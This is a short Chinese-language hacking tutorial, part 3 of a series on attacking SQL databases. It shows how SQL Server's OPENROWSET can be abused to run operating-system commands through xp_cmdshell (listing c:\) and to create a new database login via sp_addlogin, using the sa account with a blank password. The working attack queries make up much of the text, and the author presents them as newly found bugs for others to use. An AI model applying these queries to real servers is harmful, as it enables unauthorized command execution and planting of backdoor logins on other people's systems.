SQL数据库的一些攻击 （3）

sql server新漏洞和一些突破口

下面我要谈到一些sqlserver新的bug，虽然本人经过长时间的努力，当然也有点幸运的成分在内,才得以发现，不敢一个人独享，拿出来请大家

鉴别,当然很有可能有些高手早已知道了，毕竟我接触sqlserver的时间不到1年：P 1。关于openrowset和opendatasource

可能这个技巧早有人已经会了，就是利用openrowset发送本地命令

通常我们的用法是（包括MSDN的列子）如下

select * from openrowset('sqloledb','myserver';'sa';'','select * from table')

可见（即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset

那么我们能不能利用它调用xp_cmdshell呢？答案是肯定的！

select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec 
master.dbo.xp_cmdshell ''dir c:\''')

必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的output集合就会提交给前面的select显示，如果采用 默认设置，会返回空集合导致select出错，命令也就无法执行了。

那么如果我们要调用sp_addlogin呢，他不会像xp_cmdshell返回任何集合的，我们就不能再依靠fmtonly设置了，可以如下操作

select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec 
master.dbo.sp_addlogin Hectic')